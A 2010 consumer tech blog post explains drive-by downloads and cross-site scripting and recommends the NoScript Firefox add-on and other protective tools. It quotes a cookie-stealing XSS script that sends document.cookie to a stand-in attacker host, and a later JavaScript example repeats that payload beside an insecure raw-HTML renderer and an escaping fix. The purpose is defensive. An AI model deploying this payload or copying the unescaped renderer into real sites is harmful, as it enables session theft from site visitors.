Scoroncocolo TechPages


Windows Hacks and Facts

Cool Software.

XP and Vista tips and tweaks and lots of other geeky things for computer users

May 16, 2010


Firefox Add-on NoScript

Drive-by Downloads


Protect yourself from Drive-by Downloads with Firefox's add-on, NoScript.

Very recently I posted a page on Scareware, an increasingly prevalent and perverse method of infecting computers with malware (viruses, trojans, rootkits, keyloggers and other pernicious junk). Unlike that scenario, where someone might be tempted to download and install something that looks to be a legitimate anti-spyware program but instead turns out to contain a whole host of the very malware it misleadingly proposed to guard against, a Drive-by download occurs with little if any interaction on the user's part at all. You can become a victim of a Drive-by download just by visiting a purposely infested website, or a perfectly innocent website that cyber criminals have managed to sabotage. And you don't necessarily have to slum around in the sleazy neighborhoods of the Web to become a victim of a Drive-by download, although doing so would very much increase your chances. On April 15, 2010, researchers at ALWIL Software, providers of Avast Anti-virus software, publicly announced that they had used automated feedback from their users to estimate that there are approximately 252,800 domains (websites) worldwide infected with malware. That amounts to 2,150,000 infected web pages worldwide. ALWIL did not provide any numbers on infected sites registered in the US. But for British-based websites alone, the list included over 3,000 infected domains. Many of the infected sites were small businesses or travel sites such as harrysbars.co.uk and westminster-london-hotels.co.uk. The point being that these infested sites are not the type of website that one would ordinarily be suspicious of.

So why would Harry's Bar decide to expose visitors to its website to viruses, trojans, rootkits and other malicious spyware? The chances are near 100% that "Harry" had no idea that his site was compromised. If a website hosts ads or widgets, hosts forums, or has comments sections on its pages, that site is susceptible to outside injection through a technique known as Cross-site Scripting, usually abbreviated XSS. Unfortunately, Cross-site Scripting is becoming increasingly widespread because it's not that difficult to do. In the simplest terms, XSS is the injection of malicious JavaScript into a legitimate Web page, where it can then be executed in the browsers of innocent visitors to that page. A Web site is susceptible to Cross-site Scripting if it allows users to upload content to be shared with other visitors to the website. A website owner who allows this type of content must constantly inspect that content to remove any potentially harmful scripting code. The classic example of this sort of vulnerability is content management software such as forums and bulletin boards where users are allowed to use raw HTML to format their posts.

Many websites host bulletin boards, chat rooms, message boards or, now more commonly, comments on individual blog posts, where registered users may post messages which are stored in a database of some kind. A registered user is commonly tracked using a session ID cookie authorizing them to post. If an attacker were to post a message containing specially crafted JavaScript, a user reading this message could have their cookies and their account compromised.

<SCRIPT>
document.location = 'http://attackerhost.example/cgi-bin/cookiesteal.cgi?' + document.cookie
</SCRIPT>

Although the above snippet of code is designed to steal browser session cookies, it could easily be altered to redirect an unsuspecting user to an infested website controlled by the cyber-crook who sabotaged the message board or comment section of the legitimate website. The page the user is redirected to could look innocuous enough, but it could in fact be an attack page. A typical attack page contains a barrage of script (usually JavaScript) exploits targeting a variety of weaknesses in different versions of the browser, operating system, and other programs. If any security breaches are found, the user's computer could very quickly fall victim to a drive-by download that could include rootkits, keyloggers, viruses and all sorts of other vile malware.
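The site-owner side of the advice above ("inspect that content to remove any potentially harmful scripting code") is easier to get right by escaping everything a user posts and then offering a small, fixed formatting syntax instead of raw HTML. The example below is added here and is not code from the original post or from NoScript; the function names, the BBCode-style subset and the sample posts are all constructed for illustration, and the cookie header shows the HttpOnly attribute that keeps a session cookie out of document.cookie.

```javascript
// Added example (not from the original post): rendering user-posted comments
// so that injected markup is shown as text rather than executed.
// Escape first, then translate a fixed formatting subset into known-safe tags.

// Map each HTML-significant character to its entity.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITIES[ch]);
}

// The insecure pattern the post describes: forum software that pastes the
// user's raw HTML straight into the page. Kept here only for comparison.
function renderRaw(post) {
  return '<div class="post">' + post + '</div>';
}

// Safer: neutralise all markup, then allow a tiny BBCode-style subset whose
// output tags are fixed strings, so user input can never become a tag.
function renderSafe(post) {
  let html = escapeHtml(post);
  html = html.replace(/\[b\]([\s\S]*?)\[\/b\]/g, '<b>$1</b>');
  html = html.replace(/\[i\]([\s\S]*?)\[\/i\]/g, '<i>$1</i>');
  return '<div class="post">' + html + '</div>';
}

// Check used below: does the rendered output contain a real script element?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Defence in depth for the session cookie the post mentions: HttpOnly keeps it
// out of document.cookie, so even a script that does run cannot read it.
function sessionCookieHeader(sessionId) {
  return `SESSIONID=${encodeURIComponent(sessionId)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Constructed samples: the cookie-stealing payload quoted in the post, as a
// forum user might submit it, and an ordinary comment using the subset.
const HOSTILE_POST =
  "<SCRIPT>document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'+document.cookie</SCRIPT>";
const FRIENDLY_POST = 'Great tip, [b]thanks[/b] for the [i]NoScript[/i] write-up!';

console.log('raw render contains <script>:', containsScript(renderRaw(HOSTILE_POST)));   // true
console.log('safe render contains <script>:', containsScript(renderSafe(HOSTILE_POST))); // false
console.log(renderSafe(FRIENDLY_POST));
```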

How to Combat Drive-by Downloads


Listed below are a number of things you can do to lessen your chances of becoming the victim of a drive-by download.

First and most importantly, to avoid cross-site scripting exploits, never click on links in the area of webpages where people other than the site's owner have posted content. And of course we all know not to open email attachments from suspicious sources or click on links in email messages that we aren't absolutely certain come from people or businesses we know and trust.

Use a good third-party firewall like ZoneAlarm that helps to protect you from outside and inside. The built-in firewalls in Windows XP and Vista are essentially useless because they don't protect you from programs that might have wormed their way onto your computer and are now attempting to "dial home", and the Windows 7 firewall is not much better. A smarter, safer option is to download and install ZoneAlarm. Once ZoneAlarm is up and running it will automatically turn off Windows' Firewall, which is good because you never want to run more than one firewall at a time.

Always make sure you are using the latest non-beta version of whichever browser you choose to use. Firefox, Google's Chrome, Opera and Apple's Safari will be safer than Microsoft's Internet Explorer because, even though the other browsers are all gaining market share on IE, Internet Explorer is still the most used browser of all, since it comes pre-installed on all versions of Windows. For this reason, and because IE users tend to be less tech savvy than users of other browsers, the bad guys devote more of their time, energy and resources to searching for security flaws in Internet Explorer than in any other browser. If you must use IE, use IE 8, not IE 7, and certainly not Internet Explorer 6. You don't need to do anything special to keep IE 8 patched other than to make sure your computer is set to automatically download and install Windows Updates. Microsoft releases security patches on Patch Tuesday, which is the second Tuesday of every month. But you can be sure that every Wednesday morning after Patch Tuesday the bad guys are up bright and early looking for ways to circumvent the patches and/or find new holes in the browser through which to attack innocent users. So never assume that any browser, and especially Internet Explorer, is invulnerable. To make sure you are using the latest version of Firefox and most other non-Microsoft browsers, when the browser is open to any webpage, click Help at the top of the page and in the drop-down menu click Check for Updates. To find out which version of the browser you are using, in almost all browsers click Help, then About.

Use Firefox's plug-in checker to keep your browser add-ons and plug-ins up to date. See Computer World's page on the new Firefox plug-in checker, published on the 12th of this month. Firefox has fashioned its plug-in checker so that it works in browsers other than its own. It will check for updates to important plug-ins like Adobe's Flash in Google Chrome, Opera, Safari and even Internet Explorer 7 and 8.

Seriously consider using a browser other than Internet Explorer. Microsoft has recently admitted that there is a design flaw in all of its browsers, even IE 8, that could allow cyber-criminals to "read" every file on your hard drive!

O.K., so you are behind a truly decent firewall and you're using the latest version of Firefox, which, as of the time I'm writing this, is version 3.6.3, or some other up-to-date browser. But there are other things to consider. How often do you open (read) PDF files online? How often do you download PDF files? Do you use Adobe Reader for these purposes? I don't, but most people do. Do you use Adobe Flash Player to watch videos? Adobe is the provider of a lot of software we use in conjunction with our browsers, and therefore the vulnerabilities in its products are conduits through which cyber-criminals can attack us. Adobe does a poor job of closing security holes in its products, according to Apple's CEO Steve Jobs, but it does offer patches from time to time, although it doesn't offer any intuitive manner of notifying its users when updates are available. This is where Secunia Personal Software Inspector comes to the rescue. Secunia PSI works in the background and monitors the update pages of all of the software installed on your computer. Once it finds that an update is available it alerts you. It then offers to direct you to the location on the Web where the update is available. Back on January 8, 2009 I posted a long article on using Secunia and radarsync to update your computer that you might want to have a look at.

On October 19, 2009 I posted a piece on this blog explaining that the safest way to browse the Internet is to do so inside a Sandbox, and I recommended what I still believe is the best free software for doing that, which is Sandboxie. While using Sandboxie to browse the Internet is the surest way to stay safe from any sort of malware, it is only effective if you use it every time you go online. And well... I don't, and you probably won't either. It's not a set-it-and-forget-it thing.

But what I'm using now to protect myself while browsing the Web is a set-it-and-forget-it thing. It's a Firefox add-on called NoScript.

Firefox Add-on NoScript


The object of NoScript is elegantly simple. It allows no scripts to run in your browser without your permission. And not just JavaScript. NoScript blocks Java™ (Java and JavaScript are two completely different languages), Microsoft's Silverlight™, Flash®, and other plugins and embeddings such as HTML video/audio elements and downloadable fonts. It will block Java Applets, Flash movies, QuickTime clips and PDF documents. It blocks code written in Perl and Ruby and Ruby-on-Rails. In short, NoScript blocks all scripts from running in your browser without your permission, period. Although JavaScript has been the weapon of choice used most by cyber-criminals in the past, the bad guys are now more frequently targeting other scripting methods. That is why the Firefox add-on NoScript protects against all scripts running in your browser.

Of course there will be times that you will want scripts to run on websites and pages that you trust. Scripts are ubiquitous on the web. Ninety percent of modern webpages would not render correctly without scripting languages. I use a small amount of JavaScript on the page you're reading right now to make rounded corners, for instance. That's why NoScript allows you to selectively allow scripts to run on whole websites or on particular pages within websites that you trust.

NoScript is a cinch to use. Once you have NoScript installed on your copy of Firefox, you only need to click on a tiny icon in the bottom right corner of your browser window to tell NoScript how you want it to deal with a particular website or webpage. NoScript will remember your settings for that site or page until you instruct it to treat them differently. So NoScript doesn't slow down your browsing after it "learns" which sites you trust. If anything it speeds up your browsing, because you can instruct NoScript to "partially allow scripts" on any page, which will render the page perfectly without loading a lot of ads, so the page loads faster.

NoScript is not the silver bullet in the fight against the malware Mafia, but it is one more very effective weapon in our arsenal. In my opinion you would be wise to use it. Here's where you can read more about and download the Firefox add-on NoScript.



Thanks For Visiting the Tech Pages

Questions? Comments? Did I get something wrong? Email me at sjh@scoroncocolo.com and I WILL get back to you.

Please add this page, or better yet my entire site, to your Favorites and keep checking back. This page is a work in progress. I intend to edit it and add to it from time to time. In the meantime, if you have any ideas about how I could enhance the content of this page, please email me about it.

If you see anything in this post that needs to be corrected, email me about that, as well. I'll make the changes and make sure you get credit for spotting my mistakes. If you have any questions or comments about anything in this post or any other posts on the Tech Pages, email me at sjh@scoroncocolo.com and I will get back to you.

Don't forget to visit my Home Page at Scoroncocolo.com. And if that's how you got here in the first place, hit your Back button and look around. You can read my other Tech Pages posts by going to my home page and looking for them there. You can also look on the left side of this page and click on any of my Previous Posts.

To make this page and all of the other of my Tech Pages easy to find, type Ctrl + d to bookmark me and come back once a week or so and see what's new.


Copyright © Scoroncocolo 2008 - 2010